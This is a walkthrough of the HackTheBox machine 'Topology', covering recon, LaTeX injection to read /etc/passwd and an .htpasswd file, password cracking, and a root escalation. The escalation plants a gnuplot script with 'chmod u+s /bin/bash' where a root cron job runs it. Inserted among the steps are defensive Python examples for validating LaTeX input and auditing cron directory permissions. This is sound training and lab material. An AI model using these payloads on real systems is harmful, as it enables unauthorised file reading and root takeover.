Topology

#Linux #Enumeration

This is an easy difficulty Linux machine from HackTheBox created by gedsic. In this scenario, my IP is 10.10.14.71 and the target's IP is 10.129.151.145.

Recon

The first steps are about getting basic information about the target, using nmap and looking for information on the website.

Local Terminal
$ ping -c 1 10.129.151.145

PING 10.129.151.145 (10.129.151.145) 56(84) bytes of data.
64 bytes from 10.129.151.145: icmp_seq=1 ttl=62 time=174 ms

--- 10.129.151.145 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 174.093/174.093/174.093/0.000 ms

The machine is alive, and from the TTL (close to 64) we can assume that it is a Linux machine.

Local Terminal
nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.151.145 -oG AllPorts
Completed SYN Stealth Scan at 16:03, 26.39s elapsed (65535 total ports)
Nmap scan report for 10.129.151.145
Host is up, received reset ttl 62 (0.0029s latency).
Scanned at 2023-07-05 16:03:03 UTC for 26s
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE REASON
22/tcp  open  ssh     syn-ack ttl 62
80/tcp  open  http    syn-ack ttl 62
443/tcp open  https   syn-ack ttl 62

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.63 seconds
           Raw packets sent: 131091 (5.768MB) | Rcvd: 5122 (204.880KB)
Local Terminal
nmap -sCV -p 22,80,443 10.129.151.145 -oN Target
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-05 16:04 UTC
Nmap scan report for 10.129.151.145
Host is up (0.022s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 dc:bc:32:86:e8:e8:45:78:10:bc:2b:5d:bf:0f:55:c6 (RSA)
|   256 d9:f3:39:69:2c:6c:27:f1:a9:2d:50:6c:a7:9f:1c:33 (ECDSA)
|_  256 4c:a6:50:75:d0:93:4f:9c:4a:1b:89:0a:7a:27:08:d7 (ED25519)
80/tcp  open  http    Apache/2.4.41 (Ubuntu)
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Miskatonic University | Topology Group
| fingerprint-strings:
|   FourOhFourRequest, GetRequest, HTTPOptions:
|     HTTP/1.0 403 connecting to :80: connecting to <nil>:80: dial tcp :80: connectex: No connection could be made because the target machine actively refused it.
|     Connection: close
|     connecting to :80: connecting to <nil>:80: dial tcp :80: connectex: No connection could be made because the target machine actively refused it.
|   GenericLines:
|     HTTP/1.0 400 reading request: malformed HTTP request ""
|     Connection: close
|     reading request: malformed HTTP request ""
|   Help:
|     HTTP/1.0 400 reading request: malformed HTTP request "HELP"
|     Connection: close
|     reading request: malformed HTTP request "HELP"
|   RTSPRequest:
|     HTTP/1.0 400 reading request: malformed HTTP version "RTSP/1.0"
|     Connection: close
|_    reading request: malformed HTTP version "RTSP/1.0"
443/tcp open  https?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
<...>

By searching "OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 launchpad" you can conclude that this is an Ubuntu Focal machine. This is good to know on some targets in case there is a specific Linux exploit for that release.

Local Terminal
whatweb http://10.129.151.145
http://10.129.151.145 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], 
Email[lklein@topology.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], 
IP[10.129.151.145], Title[Miskatonic University | Topology Group]

There is an email address; save that information: { lklein@topology.htb }

Not found: add the new domain to /etc/hosts as "10.129.151.145 latex.topology.htb topology.htb" before trying again.

But first, check whether there is more to explore at latex.topology.htb.

Exploit

Search for "LaTeX Injection Exploit" and return to http://latex.topology.htb/equation.php

Maybe it has some validation... let's look for a different way to execute commands.

  • \include{password} Fail

  • \lstinputlisting{/etc/passwd} Fail

  • $\include{password}$ Fail

  • $\lstinputlisting{/etc/passwd}$
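The pattern above (plain `\lstinputlisting` rejected, the same command inside `$...$` accepted) is what a pattern match on the start of the input looks like from the outside. As an added example, not code from the write-up or from the box, here is an allowlist check for an equation renderer that tokenises every control word wherever it appears; the allowlist contents are a constructed assumption.

```python
import re

# Control sequences that a math-only renderer has a reason to accept.
# Constructed allowlist for this example; a real deployment extends it.
ALLOWED = {
    "frac", "sqrt", "sum", "int", "prod", "lim", "infty", "cdot", "times",
    "alpha", "beta", "gamma", "theta", "pi", "sigma", "omega", "phi",
    "left", "right", "mathbb", "mathrm", "partial", "nabla", "hat", "vec",
}

# A control word (\name) or a control symbol (\{, \}, \\, \$ ...).
CONTROL_SEQ = re.compile(r"\\([A-Za-z]+|.)", re.S)

def check_equation(src: str) -> tuple:
    """Return (ok, reason) for a user-supplied equation body.

    Tokenising the whole string (rather than matching the start of it)
    means wrapping a command in $...$ changes nothing: every control word
    is checked against the allowlist wherever it appears.
    """
    if "%" in src or "^^" in src:
        # '%' comments out the rest of the line (including delimiters the
        # renderer appends); '^^' is TeX's byte-escape syntax.
        return False, "comment or ^^ escape not allowed"
    for m in CONTROL_SEQ.finditer(src):
        name = m.group(1)
        if name.isalpha() and name not in ALLOWED:
            return False, "command \\%s not allowed" % name
    return True, "ok"

# The four probes from the write-up above.
PROBES = [
    r"\include{password}",
    r"\lstinputlisting{/etc/passwd}",
    r"$\include{password}$",
    r"$\lstinputlisting{/etc/passwd}$",
]

def rejected_probes() -> list:
    """Reason string the allowlist gives for each probe."""
    return [check_equation(p)[1] for p in PROBES]

if __name__ == "__main__":
    for p in PROBES + [r"\frac{\partial f}{\partial x} = \sum_i \alpha_i"]:
        print(p, "->", check_equation(p))
```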

Reverse Shell [vdaisley]

All right, we can read files but we can't execute commands. At this point the best option is to gather information about the target and see whether we can read some file that stores passwords.

For "Apache/2.4.41" the htpasswd file is usually located under /var/www/html/. Trying $\lstinputlisting{/var/www/html/.htpasswd}$ fails... what about dev? Try: $\lstinputlisting{/var/www/dev/.htpasswd}$

Let's use John to crack the password.

Local Terminal
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
calculus20       (?)
1g 0:00:00:05 DONE (2023-07-05 19:34) 0.1941g/s 193342p/s 193342c/s 193342C/s calebd1..caitlyn09
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now, with the password, we can try to log in through SSH {vdaisley : calculus20}

Local Terminal
ssh vdaisley@10.129.151.145
Target Terminal [vdaisley]
cat user.txt

Privilege Escalation [vdaisley > root]

We are inside the machine, now we want to change to root.

Scouting process:

Target Terminal [vdaisley]
vdaisley@topology:/$ id
uid=1007(vdaisley) gid=1007(vdaisley) groups=1007(vdaisley)

vdaisley@topology:/$ sudo -l
[sudo] password for vdaisley:
Sorry, user vdaisley may not run sudo on topology.

vdaisley@topology:/$ find \-perm -4000 2>/dev/null
./usr/sbin/pppd
./usr/lib/openssh/ssh-keysign
./usr/lib/policykit-1/polkit-agent-helper-1
./usr/lib/eject/dmcrypt-get-device
./usr/lib/dbus-1.0/dbus-daemon-launch-helper
./usr/bin/sudo
./usr/bin/fusermount
./usr/bin/umount
./usr/bin/su
./usr/bin/chsh
./usr/bin/newgrp
./usr/bin/at
./usr/bin/gpasswd
./usr/bin/mount
./usr/bin/passwd
./usr/bin/chfn

vdaisley@topology:/$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep

Nothing suspicious. An alternative here is to look at running processes with pspy.

Local Terminal
python3 -m http.server 8080
Target Terminal [vdaisley]
cd /tmp
wget http://10.10.14.71:8080/pspy64
chmod +x pspy64

Open an http.server locally and download pspy from the target, then execute the file.

Target Terminal [vdaisley]
./pspy64
<...>
2023/07/05 16:33:25 CMD: UID=0     PID=1      | /sbin/init
2023/07/05 16:34:01 CMD: UID=0     PID=7685   | /usr/sbin/CRON -f
2023/07/05 16:34:01 CMD: UID=0     PID=7684   | /usr/sbin/CRON -f
2023/07/05 16:34:01 CMD: UID=0     PID=7686   | /bin/sh -c find "/opt/gnuplot" -name "*.plt" -exec gnuplot {} \;
2023/07/05 16:34:01 CMD: UID=0     PID=7687   | find /opt/gnuplot -name *.plt -exec gnuplot {} ;
2023/07/05 16:34:01 CMD: UID=0     PID=7688   |
2023/07/05 16:34:01 CMD: UID=0     PID=7689   |
2023/07/05 16:34:01 CMD: UID=0     PID=7690   | /bin/sh -c /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7691   | /bin/sh /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7694   | /bin/sh /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7693   | /bin/sh /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7692   | grep enp
2023/07/05 16:34:01 CMD: UID=0     PID=7697   | /bin/sh /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7696   | /bin/sh /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7695   | /bin/sh /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7698   | /bin/sh /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7699   | /bin/sh /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7700   | /bin/sh /opt/gnuplot/getdata.sh
<...>

That fragment looks pretty interesting... let's check what's inside.

Target Terminal [vdaisley]
vdaisley@topology:/tmp$ cd /opt/gnuplot

vdaisley@topology:/opt/gnuplot$ ls
ls: cannot open directory '.': Permission denied

We can't see anything inside, but from pspy we know that something is being executed from there as root, so search for exploits.

Target Terminal [vdaisley]
vdaisley@topology:/tmp$ nano exploit.plt
system "chmod u+s /bin/bash"

After creating the payload, we move it to /opt/gnuplot. Why? Because of the following line from the pspy64 output:

  • /bin/sh -c find "/opt/gnuplot" -name "*.plt" -exec gnuplot {} \;
Target Terminal [vdaisley]
cp exploit.plt /opt/gnuplot/exploit.plt
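The precondition that makes this work is a root cron job running `find ... -exec` over a directory that an unprivileged user can write into (note that the directory could not even be listed, yet the copy succeeded). As an added example from the defender's side, not part of the write-up, here is a small audit that parses a cron command of that shape and checks the directory's write bits; the temporary directory in `demo()` is a constructed stand-in for /opt/gnuplot.

```python
import os
import shlex
import stat
import tempfile

def parse_find_exec(cmd: str) -> tuple:
    """Extract (search_dir, exec_program) from a cron command shaped like
       find "/opt/gnuplot" -name "*.plt" -exec gnuplot {} \\;
    Returns (None, None) when the line is not of that form."""
    tokens = shlex.split(cmd)
    if tokens[:2] == ["/bin/sh", "-c"]:   # pspy shows the sh -c wrapper
        tokens = tokens[2:]
        if len(tokens) == 1:              # the usual quoted form: sh -c '...'
            tokens = shlex.split(tokens[0])
    if len(tokens) < 4 or tokens[0] != "find" or "-exec" not in tokens:
        return None, None
    return tokens[1], tokens[tokens.index("-exec") + 1]

def others_can_write(path: str) -> bool:
    """True when group or world can write into the directory. Write access
    does not require read access, so a directory that 'ls' cannot open can
    still receive a planted file. A directory owned by a non-root user
    would deserve the same flag even with these bits clear."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_cron_line(cmd: str) -> dict:
    """Report whether a root cron job of the find/-exec shape executes
    files from a directory that unprivileged users can write into."""
    search_dir, prog = parse_find_exec(cmd)
    if search_dir is None:
        return {"matched": False}
    try:
        risky = others_can_write(search_dir)
    except OSError:
        risky = None                      # directory missing or unreadable
    return {"matched": True, "dir": search_dir, "exec": prog,
            "others_can_write": risky}

def demo() -> dict:
    """Constructed stand-in for /opt/gnuplot: mode 0733 first (cannot list,
    can still copy into), then 0755 as the corrected permission."""
    with tempfile.TemporaryDirectory() as tmp:
        gp = os.path.join(tmp, "gnuplot")
        os.mkdir(gp)
        cmd = 'find "%s" -name "*.plt" -exec gnuplot {} \\;' % gp
        os.chmod(gp, 0o733)
        before = audit_cron_line(cmd)["others_can_write"]
        os.chmod(gp, 0o755)
        after = audit_cron_line(cmd)["others_can_write"]
    return {"before": before, "after": after}

if __name__ == "__main__":
    print(demo())
```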

And now we wait...

Target Terminal [root]
vdaisley@topology:/tmp$ bash -p

bash-5.0# cat /root/root.txt
7e8f8c4ea86750ebbf6619bfe1bffc4d
